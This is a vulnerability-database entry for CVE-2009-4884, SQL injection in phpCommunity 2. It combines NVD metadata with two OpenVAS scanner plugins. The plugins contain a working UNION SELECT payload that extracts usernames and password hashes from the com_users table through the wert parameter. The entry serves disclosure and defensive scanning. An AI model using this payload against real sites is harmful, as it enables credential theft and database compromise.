ID CVE-2009-4884 Type cve Reporter cve@mitre.org Modified 2018-10-10T19:49:00
Description
Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.
{"id": "CVE-2009-4884", "bulletinFamily": "NVD", "title": "CVE-2009-4884", "description": "Multiple SQL injection vulnerabilities in phpCommunity 2 2.1.8, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via (1) the forum_id parameter in a forum action to index.php, (2) the topic_id parameter in a forum action to index.php, (3) the wert parameter in an id search action to index.php, (4) the wert parameter in a nick search action to index.php, or (5) the wert parameter in a forum search action to index.php, related to class_forum.php and class_search.php.", "published": "2010-06-11T14:30:00", "modified": "2018-10-10T19:49:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4884", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/49151", "http://www.exploit-db.com/exploits/8185", "http://www.securityfocus.com/archive/1/501588/100/0/threaded"], "cvelist": ["CVE-2009-4884"], "type": "cve", "lastseen": "2019-05-29T18:10:02", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "a1178ff1ee5d08816205b6062c82aab9"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "982252ea0db6b2f09062bf422a44e242"}, {"key": "cpe23", "hash": "b08965042dc752100f44b3bfb880dac5"}, {"key": "cvelist", "hash": "60189db8263dad0a06dc1f2eacf47880"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "805c5c751007648306c308e497e20dab"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "035453e9e0189191f5ebf4cdc778e852"}, {"key": "href", "hash": "5313f3bb7fe34cbd7c3adfad1e030c36"}, {"key": "modified", "hash": "7e847836773de0d2aceb645c56dcc402"}, {"key": "published", "hash": "549523bb9bc0afb3405b3a08b22a5041"}, {"key": "references", "hash": "7f99d792192fdbc28259160203bfcea6"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "b423793a8377cfcb1a0866f73ebf6b51"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "ad96dcd5a2013355ae589fd321bfe7ab2b6de78199b6cda7fb1c996f5e8dd5aa", "viewCount": 0, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2019-05-29T18:10:02"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310100041", "OPENVAS:100041"]}], "modified": "2019-05-29T18:10:02"}, "vulnersScore": 7.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:bernhard_frohlich:phpcom:2.1.8"], "affectedSoftware": [{"name": "bernhard_frohlich phpcom", "operator": "eq", "version": "2.1.8"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:bernhard_frohlich:phpcom:2.1.8:*:*:*:*:*:*:*"], "cwe": ["CWE-89"]}
{"openvas": [{"lastseen": "2019-12-06T16:47:07", "bulletinFamily": "scanner", "description": "phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.", "modified": "2019-12-04T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:1361412562310100041", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100041", "title": "phpCommunity2 Multiple Remote Input Validation Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpCommunity2 Multiple Remote Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100041\");\n script_version(\"2019-12-04T13:23:25+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-04 13:23:25 +0000 (Wed, 04 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 06:42:27 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2009-4884\", \"CVE-2009-4885\", \"CVE-2009-4886\");\n script_bugtraq_id(34056);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"phpCommunity2 Multiple Remote Input Validation Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"summary\", value:\"phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/34056/\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\n since the disclosure of this vulnerability. Likely none will be provided anymore.\n General solution options are to upgrade to a newer release, disable respective features,\n remove the product or replace the product by another one.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/phpcom\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23\");\n\n if(http_vuln_check(port:port, url:url,pattern:\"admin:[a-f0-9]{32}\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:13:48", "bulletinFamily": "scanner", "description": "phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.", "modified": "2017-03-29T00:00:00", "published": "2009-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=100041", "id": "OPENVAS:100041", "title": "phpCommunity2 Multiple Remote Input Validation Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: phpCommunity2_multiple_remote_input_validation.nasl 5770 2017-03-29 14:34:03Z cfi $\n#\n# phpCommunity2 Multiple Remote Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"phpCommunity2 is prone to multiple input-validation vulnerabilities,\n including multiple directory-traversal issues and SQL-injection issues,\n and a cross-site scripting issue.\n\n Exploiting these issues could allow an attacker to view arbitrary\n local files within the context of the webserver, steal cookie-based\n authentication credentials, compromise the application, access or\n modify data, or exploit latent vulnerabilities in the underlying\n database.\";\n\n\nif (description)\n{\n script_id(100041);\n script_version(\"$Revision: 5770 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-29 16:34:03 +0200 (Wed, 29 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 06:42:27 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2009-4884\", \"CVE-2009-4885\", \"CVE-2009-4886\");\n script_bugtraq_id(34056);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"phpCommunity2 Multiple Remote Input Validation Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/34056/\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port)) exit(0);\n\nforeach dir( make_list_unique( \"/phpcom\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23\");\n\n if(http_vuln_check(port:port, url:url,pattern:\"admin:[a-f0-9]{32}\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}